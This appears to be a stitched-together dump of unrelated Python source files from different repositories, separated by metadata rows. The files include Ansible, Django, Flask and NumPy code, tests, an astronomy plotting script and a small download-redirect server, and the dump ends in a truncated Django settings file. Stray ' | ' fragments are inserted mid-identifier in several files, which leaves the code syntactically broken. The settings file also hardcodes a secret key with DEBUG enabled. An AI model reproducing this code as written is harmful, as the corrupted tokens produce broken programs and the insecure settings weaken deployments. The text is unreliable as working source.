     default: false
   availability_zone:
     description:
       - Ignored. Present for backwards compatibility
     required: false
extends_documentation_fragment: openstack
'''

EXAMPLES = '''
# Gather facts about all servers named C<web*>:
- os_server_facts:
    cloud: rax-dfw
    server: web*
- debug:
    var: openstack_servers
'''

import fnmatch

# shade is an optional third-party dependency; record its availability so
# main() can fail with a clear message instead of an ImportError.
try:
    import shade
    from shade import meta
    HAS_SHADE = True
except ImportError:
    HAS_SHADE = False
def main():
    """Collect OpenStack server facts and report them via exit_json."""
    argument_spec = openstack_full_argument_spec(
        server=dict(required=False),
        detailed=dict(required=False, type='bool'),
    )
    module = AnsibleModule(argument_spec, **openstack_module_kwargs())
    if not HAS_SHADE:
        module.fail_json(msg='shade is required for this module')
    try:
        cloud = shade.openstack_cloud(**module.params)
        openstack_servers = cloud.list_servers(
            detailed=module.params['detailed'])
        pattern = module.params['server']
        if pattern:
            # Keep only servers whose name or UUID matches the glob.
            openstack_servers = [
                server for server in openstack_servers
                if fnmatch.fnmatch(server['name'], pattern)
                or fnmatch.fnmatch(server['id'], pattern)]
        module.exit_json(changed=False, ansible_facts=dict(
            openstack_servers=openstack_servers))
    except shade.OpenStackCloudException as e:
        module.fail_json(msg=str(e))
# this is magic, see lib/ansible/module_common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
# Standard Ansible module entry point.
if __name__ == '__main__':
    main()
|
fedora-infra/fedora-packages | fedoracommunity/widgets/package/package.py | Python | agpl-3.0 | 4,090 | 0.001711 | import mako
import uuid
import moksha.common.utils
import logging
import tw2.core as twc
import tg
from fedoracommunity.lib.utils import OrderedDict
from mako.template import Template
from fedoracommunity.connectors.api import get_connector
log = logging.getLogger(__name__)
class TabWidget(twc.Widget):
    """Tabbed navigation widget mapping display names to moksha widget keys."""

    template = "mako:fedoracommunity.widgets.package.templates.tabs"
    base_url = twc.Param(default='/')
    args = twc.Param(default=None)
    kwds = twc.Param(default=None)
    # Fix: this attribute was declared twice in the original; one
    # declaration suffices.
    tabs = twc.Variable(default=None)
    _uuid = twc.Param(default=None)
    widget = twc.Variable(default=None)
    active_tab = twc.Variable(default=None)
    # Subclasses set this to the tab selected when the URL names none.
    default_tab = None

    def __init__(self, *args, **kw):
        super(TabWidget, self).__init__(*args, **kw)
        self._uuid = str(uuid.uuid4())
        # Normalize "Display Name" -> "display_name" keys once, keeping order.
        self._expanded_tabs = OrderedDict()
        for key, widget_key in self.tabs.items():
            display_name = key
            key = key.lower().replace(' ', '_')
            self._expanded_tabs[key] = {'display_name': display_name,
                                        'widget_key': widget_key}

    def prepare(self):
        super(TabWidget, self).prepare()
        if not self.args:
            self.args = []
        if not self.kwds:
            self.kwds = {}
        # Mako templates may pass mako.runtime.Undefined instead of None.
        if isinstance(self.args, mako.runtime.Undefined):
            self.args = []
        if isinstance(self.kwds, mako.runtime.Undefined):
            self.kwds = {}
        # The first positional arg selects the tab; otherwise use the default.
        if self.args:
            active_tab = self.args.pop(0).lower()
        else:
            active_tab = self.default_tab.lower()
        try:
            self.widget = moksha.common.utils.get_widget(
                self._expanded_tabs[active_tab]['widget_key'])
        except KeyError:
            # Unknown tab name: render the chrome without an inner widget.
            self.widget = None
        self.tabs = self._expanded_tabs
        self.active_tab = active_tab
        if isinstance(self.base_url, Template):
            self.base_url = tg.url(self.base_url.render(**self.__dict__))
class PackageNavWidget(TabWidget):
    """Tab bar for a package page; maps tab labels to moksha widget keys."""
    tabs = OrderedDict([('Overview', 'package_overview'),
                        ('Builds', 'package_builds'),
                        ('Updates', 'package_updates'),
                        ('Bugs', 'package_bugs'),
                        ('Problems', 'package_problems'),
                        ('Contents', 'package_contents'),
                        ('Changelog', 'package_changelog'),
                        ('Sources', 'package_sources')])
                        #('Relationships', 'package_relationships')])
    # Rendered against prepare()'s namespace, where kwds carries package_name.
    base_url = Template(text='/${kwds["package_name"]}/');
    default_tab = 'Overview'
    args = twc.Param(default=None)
    kwds = twc.Param(default=None)
class PackageWidget(twc.Widget):
    """Chrome for a single package page: looks up package info in xapian and
    exposes summary/description to the template."""
    template = "mako:fedoracommunity.widgets.package.templates.package_chrome"
    package_name = twc.Param()
    args = twc.Param(default=None)
    kwds = twc.Param(default=None)
    summary = twc.Variable(default='No summary provided')
    description = twc.Variable(default='No description provided')
    navigation_widget = PackageNavWidget
    def prepare(self):
        # First positional URL arg is the (sub)package name being viewed.
        name = self.args.pop(0)
        self.kwds['package_name'] = name
        self.kwds['subpackage_of'] = ""
        self.package_name = name
        xapian_conn = get_connector('xapian')
        result = xapian_conn.get_package_info(name)
        self.package_info = result
        super(PackageWidget, self).prepare()
        # No match at all: fall back to the search page.
        if not result:
            tg.redirect('/s/' + name)
        if result['name'] == name:
            # Exact base-package match.
            self.summary = result['summary']
            self.description = result['description']
        else:
            # The hit is the base package of a subpackage; find the subpackage.
            self.kwds['subpackage_of'] = result['name']
            for subpkg in result['sub_pkgs']:
                if subpkg['name'] == name:
                    self.summary = subpkg['summary']
                    self.description = subpkg['description']
                    break
            else:
                # for/else: no subpackage matched either -> search page.
                tg.redirect('/s/' + name)
    def __repr__(self):
        return u"<PackageWidget %s>" % self.package_name
|
Achint08/open-event-orga-server | tests/unittests/views/guest/test_search.py | Python | gpl-3.0 | 5,392 | 0.002782 | import unittest
import urllib
from datetime import datetime, timedelta
from flask import url_for
from app import current_app as app
from app.helpers.data import save_to_db
from app.helpers.flask_ext.helpers import slugify
from tests.unittests.object_mother import ObjectMother
from tests.unittests.utils import OpenEventTestCase
def get_event():
    """Build a published 'Super Event' in India starting five days from now."""
    event = ObjectMother.get_event()
    start = datetime.now() + timedelta(days=5)
    attrs = {
        'name': 'Super Event',
        'start_time': start,
        'end_time': start + timedelta(days=5),
        'location_name': 'India',
        'searchable_location_name': 'India',
        'state': 'Published',
    }
    for field, value in attrs.items():
        setattr(event, field, value)
    return event
def get_event_two():
    """Like get_event(), but named 'Random Event' and starting eight days out."""
    event = get_event()
    event.name = 'Random Event'
    event.start_time = datetime.now() + timedelta(days=8)
    event.end_time = event.start_time + timedelta(days=4)
    return event
def assert_events(self, location_name, query_params_one=None, query_params_two=None):
    """Fetch the explore page with each query and assert that only the
    matching fixture event is listed each time."""
    if query_params_one is None:
        query_params_one = {}
    if query_params_two is None:
        query_params_two = {}

    def fetch(params):
        base = url_for('explore.explore_view', location=slugify(location_name))
        return self.app.get(base + '?' + urllib.urlencode(params),
                            follow_redirects=True)

    rv = fetch(query_params_one)
    self.assertTrue("Super Event" in rv.data, msg=rv.data)
    self.assertTrue("Random Event" not in rv.data, msg=rv.data)
    rv = fetch(query_params_two)
    self.assertTrue("Super Event" not in rv.data, msg=rv.data)
    self.assertTrue("Random Event" in rv.data, msg=rv.data)
class TestSearchEventPage(OpenEventTestCase):
    """Explore/search page filters: each query must match exactly one fixture."""

    def test_location_filter(self):
        """Events are filtered by their searchable location name."""
        with app.test_request_context():
            india_event = get_event()
            save_to_db(india_event, "Event Saved")
            us_event = get_event_two()
            us_event.location_name = 'United States'
            us_event.searchable_location_name = 'United States'
            save_to_db(us_event, "Event Saved")
            rv = self.app.get(
                url_for('explore.explore_view', location=slugify('India')),
                follow_redirects=True)
            self.assertTrue("Super Event" in rv.data, msg=rv.data)
            self.assertTrue("Random Event" not in rv.data, msg=rv.data)
            rv = self.app.get(
                url_for('explore.explore_view', location=slugify('United States')),
                follow_redirects=True)
            self.assertTrue("Super Event" not in rv.data, msg=rv.data)
            self.assertTrue("Random Event" in rv.data, msg=rv.data)

    def test_topic_filter(self):
        """Events are filtered by topic (category)."""
        with app.test_request_context():
            event_one = get_event()
            save_to_db(event_one, "Event Saved")
            event_two = get_event_two()
            event_two.topic = 'Home & Lifestyle'
            event_two.sub_topic = 'Home & Garden'
            save_to_db(event_two, "Event Saved")
            assert_events(self, event_one.location_name,
                          {'category': event_one.topic},
                          {'category': event_two.topic})

    def test_sub_topic_filter(self):
        """Events are filtered by topic plus sub-topic."""
        with app.test_request_context():
            event_one = get_event()
            save_to_db(event_one, "Event Saved")
            event_two = get_event_two()
            event_two.topic = 'Home & Lifestyle'
            event_two.sub_topic = 'Home & Garden'
            save_to_db(event_two, "Event Saved")
            assert_events(self, event_one.location_name,
                          {'category': event_one.topic,
                           'sub-category': event_one.sub_topic},
                          {'category': event_two.topic,
                           'sub-category': event_two.sub_topic})

    def test_type_filter(self):
        """Events are filtered by event type."""
        with app.test_request_context():
            event_one = get_event()
            save_to_db(event_one, "Event Saved")
            event_two = get_event_two()
            event_two.type = 'Appearance or Signing'
            save_to_db(event_two, "Event Saved")
            assert_events(self, event_one.location_name,
                          {'type': event_one.type},
                          {'type': event_two.type})

    def test_custom_date_range_filter(self):
        """Events are filtered by an explicit 'start to end' period string."""
        with app.test_request_context():
            event_one = get_event()
            save_to_db(event_one, "Event Saved")
            event_two = get_event_two()
            save_to_db(event_two, "Event Saved")

            def period(event):
                start = (event.start_time - timedelta(days=1)).strftime('%m-%d-%Y')
                end = (event.end_time + timedelta(days=1)).strftime('%m-%d-%Y')
                return start + ' to ' + end

            assert_events(self, event_one.location_name,
                          {'period': period(event_one)},
                          {'period': period(event_two)})
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
waseem18/oh-mainline | vendor/packages/Django/tests/regressiontests/generic_views/base.py | Python | agpl-3.0 | 14,853 | 0.00101 | from __future__ import absolute_import
import time
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpResponse
from django.test import TestCase, RequestFactory
from django.utils import unittest
from django.views.generic import View, TemplateView, RedirectView
from . import views
class SimpleView(View):
    """
    A simple view with a docstring.
    """
    # GET-only view; used as the baseline fixture throughout ViewTest.
    def get(self, request):
        return HttpResponse('This is a simple view')
class SimplePostView(SimpleView):
    # Reuse the GET handler for POST so the view accepts both verbs.
    post = SimpleView.get
class PostOnlyView(View):
    # No get() handler: dispatch must answer GET/HEAD with 405.
    def post(self, request):
        return HttpResponse('This view only accepts POST')
class CustomizableView(SimpleView):
    # Predeclared class attribute, so as_view(parameter=...) is accepted.
    parameter = {}
def decorator(view):
    """Mark *view* so tests can verify decorator attributes survive as_view()."""
    setattr(view, 'is_decorated', True)
    return view
class DecoratedDispatchView(SimpleView):
    # dispatch() is wrapped by `decorator`; tests check the flag survives as_view().
    @decorator
    def dispatch(self, request, *args, **kwargs):
        return super(DecoratedDispatchView, self).dispatch(request, *args, **kwargs)
class AboutTemplateView(TemplateView):
    # Supplies its template via get_template_names() instead of template_name.
    def get(self, request):
        return self.render_to_response({})
    def get_template_names(self):
        return ['generic_views/about.html']
class AboutTemplateAttributeView(TemplateView):
    # Supplies its template via the template_name attribute.
    template_name = 'generic_views/about.html'
    def get(self, request):
        return self.render_to_response(context={})
class InstanceView(View):
    # Returns the view instance itself so tests can compare per-request instances.
    def get(self, request):
        return self
class ViewTest(unittest.TestCase):
rf = RequestFactory()
    def _assert_simple(self, response):
        # Shared check: response is SimpleView's canonical 200 reply.
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.content, b'This is a simple view')
def test_no_init_kwargs(self):
"""
Test that a view can't be accidentally instantiated before deployment
"""
try:
view = SimpleView(key='value').as_view()
self.fail('Should not be able to instantiate a view')
except AttributeError:
pass
def test_no_init_args(self):
"""
Test that a view can't be accidentally instantiated before deployment
"""
try:
view = SimpleView.as_view('value')
self.fail('Should not be able to use non-keyword arguments instantiating a view')
except TypeError:
pass
def test_pathological_http_method(self):
"""
The edge case of a http request that spoofs an existing method name is caught.
"""
self.assertEqual(SimpleView.as_view()(
self.rf.get('/', REQUEST_METHOD='DISPATCH')
).status_code, 405)
def test_get_only(self):
"""
Test a view which only allows GET doesn't allow other methods.
"""
self._assert_simple(SimpleView.as_view()(self.rf.get('/')))
self.assertEqual(SimpleView.as_view()(self.rf.post('/')).status_code, 405)
self.assertEqual(SimpleView.as_view()(
self.rf.get('/', REQUEST_METHOD='FAKE')
).status_code, 405)
def test_get_and_head(self):
"""
Test a view which supplies a GET method also responds correctly to HEAD.
"""
self._assert_simple(SimpleView.as_view()(self.rf.get('/')))
response = SimpleView.as_view()(self.rf.head('/'))
self.assertEqual(response.status_code, 200)
def test_head_no_get(self):
"""
Test a view which supplies no GET method responds to HEAD with HTTP 405.
"""
response = PostOnlyView.as_view()(self.rf.head('/'))
self.assertEqual(response.status_code, 405)
def test_get_and_post(self):
"""
Test a view which only allows both GET and POST.
"""
self._assert_simple(SimplePostView.as_view()(self.rf.get('/')))
self._assert_simple(SimplePostView.as_view()(self.rf.post('/')))
self.assertEqual(SimplePostVi | ew.as_view()(
self.rf.get('/', REQUEST_METHOD='FAKE')
).status_code, 405)
def test_invalid_keyword_argument(self):
"""
Test that view arguments must be predefined on the class and can't
be named like a HTTP method.
"""
# Check each of the allowed method names
for method in SimpleView.http_method_names:
| kwargs = dict(((method, "value"),))
self.assertRaises(TypeError, SimpleView.as_view, **kwargs)
# Check the case view argument is ok if predefined on the class...
CustomizableView.as_view(parameter="value")
# ...but raises errors otherwise.
self.assertRaises(TypeError, CustomizableView.as_view, foobar="value")
def test_calling_more_than_once(self):
"""
Test a view can only be called once.
"""
request = self.rf.get('/')
view = InstanceView.as_view()
self.assertNotEqual(view(request), view(request))
def test_class_attributes(self):
"""
Test that the callable returned from as_view() has proper
docstring, name and module.
"""
self.assertEqual(SimpleView.__doc__, SimpleView.as_view().__doc__)
self.assertEqual(SimpleView.__name__, SimpleView.as_view().__name__)
self.assertEqual(SimpleView.__module__, SimpleView.as_view().__module__)
def test_dispatch_decoration(self):
"""
Test that attributes set by decorators on the dispatch method
are also present on the closure.
"""
self.assertTrue(DecoratedDispatchView.as_view().is_decorated)
def test_options(self):
"""
Test that views respond to HTTP OPTIONS requests with an Allow header
appropriate for the methods implemented by the view class.
"""
request = self.rf.options('/')
view = SimpleView.as_view()
response = view(request)
self.assertEqual(200, response.status_code)
self.assertTrue(response['Allow'])
def test_options_for_get_view(self):
"""
Test that a view implementing GET allows GET and HEAD.
"""
request = self.rf.options('/')
view = SimpleView.as_view()
response = view(request)
self._assert_allows(response, 'GET', 'HEAD')
def test_options_for_get_and_post_view(self):
"""
Test that a view implementing GET and POST allows GET, HEAD, and POST.
"""
request = self.rf.options('/')
view = SimplePostView.as_view()
response = view(request)
self._assert_allows(response, 'GET', 'HEAD', 'POST')
def test_options_for_post_view(self):
"""
Test that a view implementing POST allows POST.
"""
request = self.rf.options('/')
view = PostOnlyView.as_view()
response = view(request)
self._assert_allows(response, 'POST')
def _assert_allows(self, response, *expected_methods):
"Assert allowed HTTP methods reported in the Allow response header"
response_allows = set(response['Allow'].split(', '))
self.assertEqual(set(expected_methods + ('OPTIONS',)), response_allows)
def test_args_kwargs_request_on_self(self):
"""
Test a view only has args, kwargs & request once `as_view`
has been called.
"""
bare_view = InstanceView()
view = InstanceView.as_view()(self.rf.get('/'))
for attribute in ('args', 'kwargs', 'request'):
self.assertNotIn(attribute, dir(bare_view))
self.assertIn(attribute, dir(view))
class TemplateViewTest(TestCase):
urls = 'regressiontests.generic_views.urls'
rf = RequestFactory()
def _assert_about(self, response):
response.render()
self.assertEqual(response.status_code, 200)
self.assertContains(response, '<h1>About</h1>')
def test_get(self):
"""
Test a view that simply renders a template on GET
"""
self._assert_about(AboutTemplateView.as_view()(self.rf.get('/about/')))
def test_head(self):
"""
Test a TemplateView responds correctly to HEAD
"""
response = AboutTemplateView.as_view()(self.rf.head('/about/'))
self.assertEqual(response.status_code, 200)
def |
Bayonet-Client/bayonet-python | bayonet/exceptions.py | Python | mit | 1,465 | 0 | import json
class BayonetError(Exception):
"""All errors related to making an API request extend this."""
def __init__(self, message=None,
request_body=None, request_headers=None,
http_response_code=None, http_response_message=None):
super(BayonetError, self).__init__(message)
self.request_body = request_body
self.request_header | s = request_headers
self.http_response_code = http_response_code
self.http_response_message = http_response_message
# Get reason_code and reason_message from response
tr | y:
response_as_json = json.loads(http_response_message)
if 'reason_code' in response_as_json:
self.reason_code = response_as_json['reason_code']
else:
self.reason_code = None
if 'reason_message' in response_as_json:
self.reason_message = response_as_json['reason_message']
else:
self.reason_message = None
if 'status' in response_as_json:
self.status = response_as_json['status']
else:
self.status = None
except ValueError:
self.reason_code = None
self.reason_message = None
self.status = None
class InvalidClientSetupError(Exception):
def __init__(self, message=None):
super(InvalidClientSetupError, self).__init__(message)
|
flacjacket/sympy | examples/intermediate/differential_equations.py | Python | bsd-3-clause | 579 | 0.001727 | #!/usr/bin/env python
"""Differential equations example
Demonstrates solvin | g 1st and 2nd degree linear ordinary differential
equations.
"""
from sympy import dsolve, Eq, Function, sin, Symbol
def main():
x = Symbol("x")
f = Function("f")
eq = Eq(f(x).diff(x), f(x))
print "Solution for ", eq, " : ", dsolve(eq, f(x))
eq = Eq(f(x).diff(x, 2), -f(x))
print "Solution for ", eq, " : ", dsolve(eq, f(x))
eq = Eq(x**2*f(x).diff(x), -3*x*f(x) + sin(x)/x)
print "Solution for ", eq, " : ", dsolve(eq, f | (x))
if __name__ == "__main__":
main()
|
kumar303/addons-server | src/olympia/users/tests/test_commands.py | Python | bsd-3-clause | 2,353 | 0 | import json
import uuid
from django.core.management import call_command
from unittest.mock import ANY, patch
from six import StringIO
from olympia.amo.tests import TestCase
from olympia.users.management.commands.createsuperuser import (
Command as CreateSuperUser)
from olympia.users.models import UserProfile
@patch('olympia.users.management.commands.createsuperuser.input')
def test_createsuperuser_username_validation(input):
responses = ['', 'myusername']
input.side_effect = lambda *args: responses.pop(0)
command = CreateSuperUser()
assert command.get_value('username') == 'myusername'
@patch('olympia.users.management.commands.createsuperuser.input')
def test_createsuperuser_email_validation(input):
responses = ['', 'myemail', 'me@mozilla.org']
input.side_effect = lambda *args: responses.pop(0)
command = CreateSuperUser()
assert command.get_value('email') == 'me@mozilla.org'
class TestCreateSuperUser(TestCase):
fixtures = ['users/test_backends']
@patch('olympia.users.management.commands.createsuperuser.input')
def test_creates_user(self, input):
responses = {
'Username: ': 'myusername',
'Email: ': | 'me@mozilla.org',
}
input.side_effect = lambda label: responses[label]
count = UserProfile.objects.count()
CreateSuperUser().handle()
assert UserProfile.objects.count() == count + 1
user = UserProfile.objects.get(username='myusername')
assert user.email == 'me@mozilla.org'
def test_adds_supergroup(self):
out = StringIO()
fxa_id = uuid.uuid4().hex
call_co | mmand(
'createsuperuser',
interactive=False,
username='myusername',
email='me@mozilla.org',
add_to_supercreate_group=True,
fxa_id=fxa_id,
stdout=out)
user = UserProfile.objects.get(username='myusername')
assert user.email == 'me@mozilla.org'
assert user.read_dev_agreement
assert user.groups.filter(rules='Accounts:SuperCreate').exists()
response = json.loads(out.getvalue())
assert response == {
'username': 'myusername',
'email': 'me@mozilla.org',
'api-key': ANY,
'api-secret': ANY,
'fxa-id': fxa_id,
}
|
barentsen/iphas-dr2 | paper/figures/caldiagram/plot.py | Python | mit | 2,297 | 0.003483 | """Plots the calibrated and uncalibrated CCD over a large area."""
import os
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from astropy.io import fits
from astropy import log
from dr2 import constants
fields = constants.IPHASQC[constants.IPHASQC_COND_RELEASE]
mask = (fields['l'] > 160.0) & (fields['l'] < 200.)
ids = fields['id'][mask]
log.info('Plotting {0} fields.'.format(len(ids)))
calibrated = True
if calibrated:
CATALOGUE_PATH = '/home/gb/tmp/iphas-dr2-rc6/bandmerged-calibrated/'
else:
CATALOGUE_PATH = '/home/gb/tmp/iphas-dr2-rc6/bandmerged/'
COLORMAP = matplotlib.colors.LinearSegmentedColormap.from_list('mymap',
['#bd0026', '#f03b20', '#fd8d3c', '#fecc5c', '#ffffb2'])
rmi, rmha = [], []
for field in ids:
filename = os.path.join(CATALOGUE_PATH, field+'.fits')
log.info(filename)
d = fits.getdata(filename, 1)
veryreliable = (d['reliable']
& (d['pStar'] > 0.9)
& -d['deblend']
& -d['brightNeighb']
& (d['r'] < 18)
)
rmi.append(d['rmi'][veryreliable])
rmha.append(d['rmha'][veryreliable])
#plt.scatter(d['rmi'][veryreliable], d['rmha'][veryreliable])
plt.figure()
plt.subplots_adjust(0.16, 0.20, 0.98, 0.98 | )
vmax = 500
hist, xedges, yedges = np.hist | ogram2d(np.concatenate(rmi),
np.concatenate(rmha),
range=[[-0.3, 3.1], [-0.1, 2.1]],
bins=[320, 300])
extent = [xedges[0], xedges[-1], yedges[0], yedges[-1] ]
hist[hist == 0] = np.nan
plt.imshow(hist.T, extent=extent,
interpolation='nearest',
origin='lower',
aspect='auto',
vmin=0,
vmax=vmax,
cmap=COLORMAP)
if calibrated:
label = '(b) After re-calibration'
else:
label = '(a) Before re-calibration'
plt.text(0.06, 0.92, label,
horizontalalignment='left',
verticalalignment='top',
transform=plt.gca().axes.transAxes,
fontsize=11)
plt.xlabel('$r$ - $i$')
plt.ylabel('$r$ - $\\rm H\\alpha$')
plt.xlim([-0.3, 3.])
plt.ylim([-0.1, 1.5])
if calibrated:
output = 'ccd-calibrated.pdf'
else:
output = 'ccd-uncalibrated.pdf'
plt.savefig(output, dpi=300)
plt.close()
|
chfoo/cloaked-octo-nemesis | sandbox.yoyogames.com/bouncer.py | Python | gpl-3.0 | 1,876 | 0.010128 | from http.server import HTTPServer, BaseHTTPRequestHandler
import http.client
import re
import requests
import urllib.parse
import logging
class Handler(BaseHTTPRequestHandler):
def do_GET(self):
path, delim, query_string = self.path.partition('?')
if path != '/':
self.send_error(404)
return
query = urllib.parse.parse_qs(query_string)
if 'id' in query and query['id']:
self.process_game(query['id'][0])
else:
self.send_error(404)
def process_game(self, game_id):
try:
game_id = int(game_id)
except ValueError:
self.send_error(500)
return
url = 'h | ttp://sandbox.yoyogames.com/games/{}/download'
response = requests.get(url.format(game_id),
head | ers={'Accept-Encoding': 'gzip'})
logging.info('Fetch %s', url.format(game_id))
if response.status_code != 200:
logging.info('Failed fetch %s %s', response.status_code, response.reason)
self.send_error(500,
explain='Got {} {}'.format(response.status_code, response.reason))
match = re.search(r'<a href="(/games/[\w_-]+/send_download\?code=[\w]+)">', response.text)
download_link = 'http://sandbox.yoyogames.com{}'.format(match.group(1))
logging.info('Got URL %s', download_link)
self.send_response(http.client.TEMPORARY_REDIRECT)
self.send_header('Location', download_link)
self.send_header('Content-Length', '0')
self.end_headers()
def run():
logging.basicConfig(level=logging.INFO)
server_address = ('', 8000)
httpd = HTTPServer(server_address, Handler)
httpd.serve_forever()
if __name__ == '__main__':
run() |
nanaze/pystitch | pystitch/examples/closest_colors.py | Python | apache-2.0 | 562 | 0.021352 | """
Find | the closest DMC colors for a hex color.
Usage: python closest_colors.py <hexcolor>
"""
import sys
from .. import color
from .. import dmc_colors
def main():
if len(sys.argv) < 2:
sys.exit(__doc__)
hex_color = sys.argv[1]
rgb_color = color.RGBColorFromHexString(hex_color)
print 'Given RGB color', rgb_color
print
print 'Closest DMC colors by distance:'
for pair in dmc_colors.GetClosestDMCColorsPairs(rgb_color):
| print 'Distance:', pair[1], dmc_colors.GetStringForDMCColor(pair[0])
if __name__ == '__main__':
main()
|
plotly/plotly.py | packages/python/plotly/plotly/validators/barpolar/marker/line/_colorsrc.py | Python | mit | 423 | 0.002364 | import _plotly_utils.basevalidators
class ColorsrcValidator | (_plotly_utils.basevalidators.SrcValidator):
def __init__(
self, plotly_name="colorsrc", parent_name="barpolar.marker.line", **kwargs
):
super(ColorsrcValidator, self).__init__(
plotl | y_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "none"),
**kwargs
)
|
devs1991/test_edx_docmode | venv/lib/python2.7/site-packages/numpy/oldnumeric/precision.py | Python | agpl-3.0 | 4,239 | 0.004246 | # Lifted from Precision.py. This is for compatibility only.
#
# The character strings are still for "new" NumPy
# which is the only Incompatibility with Numeric
__all__ = ['Character', 'Complex', 'Float',
'PrecisionError', 'PyObject', 'Int', 'UInt',
'UnsignedInt', 'UnsignedInteger', 'string', 'typecodes', 'zeros']
from functions import zeros
import string # for backwards compatibility
typecodes = {'Character':'c', 'Integer':'bhil', 'UnsignedInteger':'BHIL', 'Float':'fd', 'Complex':'FD'}
def _get_precisions(typecodes):
lst = []
for t in typecodes:
lst.append( (zeros( (1,), t ).itemsize*8, t) )
return lst
def _fill_table(typecodes, table={}):
for key, value in typecodes.items():
table[key] = _get_precisions(value)
return table
_code_table = _fill_table(typecodes)
class PrecisionError(Exception):
pass
def _lookup(table, key, required_bits):
lst = table[key]
for bits, typecode in lst:
if bits >= required_bits:
return typecode
raise PrecisionError, key+" of "+str(required_bits)+" bits not available on this system"
Character = 'c'
try:
UnsignedInt8 = _lookup(_code_table, "UnsignedInteger", 8)
UInt8 = UnsignedInt8
__all__.extend(['UnsignedInt8', 'UInt8'])
except(PrecisionError):
pass
try:
UnsignedInt16 = _lookup(_code_table, "UnsignedInteger", 16)
UInt16 = UnsignedInt16
__all__.extend(['UnsignedInt16', 'UInt16'])
except(PrecisionError):
pass
try:
UnsignedInt32 = _lookup(_code_table, "UnsignedInteger", 32)
UInt32 = UnsignedInt32
__all__.extend(['UnsignedInt32', 'UInt32'])
except(PrecisionError):
pass
try:
UnsignedInt64 = _lookup(_code_table, "UnsignedInteger", 64)
UInt64 = UnsignedInt64
__all__.extend(['UnsignedInt64', 'UInt64'])
except(PrecisionError):
pass
try:
UnsignedInt128 = _lookup(_code_table, "UnsignedInteger", 128)
UInt128 = UnsignedInt128
__all__.extend(['UnsignedInt128', 'UInt128'])
except(PrecisionError):
pass
UInt = UnsignedInt = UnsignedInteger = 'u'
try:
Int0 = _lookup(_code_table, 'Integer', 0)
__ | all__.append('Int0')
except(PrecisionError):
pass
try:
Int8 = _lookup(_code_table, 'Integer', 8)
__all__.append('Int8')
except(PrecisionError):
pass
try:
Int16 = _lookup(_code_table, 'Integer', 16)
__all__.append('Int16')
except(PrecisionError):
pass
try:
| Int32 = _lookup(_code_table, 'Integer', 32)
__all__.append('Int32')
except(PrecisionError):
pass
try:
Int64 = _lookup(_code_table, 'Integer', 64)
__all__.append('Int64')
except(PrecisionError):
pass
try:
Int128 = _lookup(_code_table, 'Integer', 128)
__all__.append('Int128')
except(PrecisionError):
pass
Int = 'l'
try:
Float0 = _lookup(_code_table, 'Float', 0)
__all__.append('Float0')
except(PrecisionError):
pass
try:
Float8 = _lookup(_code_table, 'Float', 8)
__all__.append('Float8')
except(PrecisionError):
pass
try:
Float16 = _lookup(_code_table, 'Float', 16)
__all__.append('Float16')
except(PrecisionError):
pass
try:
Float32 = _lookup(_code_table, 'Float', 32)
__all__.append('Float32')
except(PrecisionError):
pass
try:
Float64 = _lookup(_code_table, 'Float', 64)
__all__.append('Float64')
except(PrecisionError):
pass
try:
Float128 = _lookup(_code_table, 'Float', 128)
__all__.append('Float128')
except(PrecisionError):
pass
Float = 'd'
try:
Complex0 = _lookup(_code_table, 'Complex', 0)
__all__.append('Complex0')
except(PrecisionError):
pass
try:
Complex8 = _lookup(_code_table, 'Complex', 16)
__all__.append('Complex8')
except(PrecisionError):
pass
try:
Complex16 = _lookup(_code_table, 'Complex', 32)
__all__.append('Complex16')
except(PrecisionError):
pass
try:
Complex32 = _lookup(_code_table, 'Complex', 64)
__all__.append('Complex32')
except(PrecisionError):
pass
try:
Complex64 = _lookup(_code_table, 'Complex', 128)
__all__.append('Complex64')
except(PrecisionError):
pass
try:
Complex128 = _lookup(_code_table, 'Complex', 256)
__all__.append('Complex128')
except(PrecisionError):
pass
Complex = 'D'
PyObject = 'O'
|
ProjectALTAIR/Simulation | mdp/reward.py | Python | gpl-2.0 | 288 | 0.03125 | """
Computes and stores | a lookup table for a given environment and reward function.
A list of reward functions will be added here and refered to by the keyword "rType".
"""
class Reward:
def __init__(self,environment,rTy | pe):
def exampleReward(self,environment):
return |
reggieroby/devpack | frameworks/djangoApp/djangoApp/settings.py | Python | mit | 3,105 | 0.001288 | """
Django settings for djangoApp project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'r&j)3lay4i$rm44n%h)bsv_q(9ysqhl@7@aibjm2b=1)0fag9n'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'djangoApp.urls'
TEMPLATES = [
{
'BACKEN | D': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WS | GI_APPLICATION = 'djangoApp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
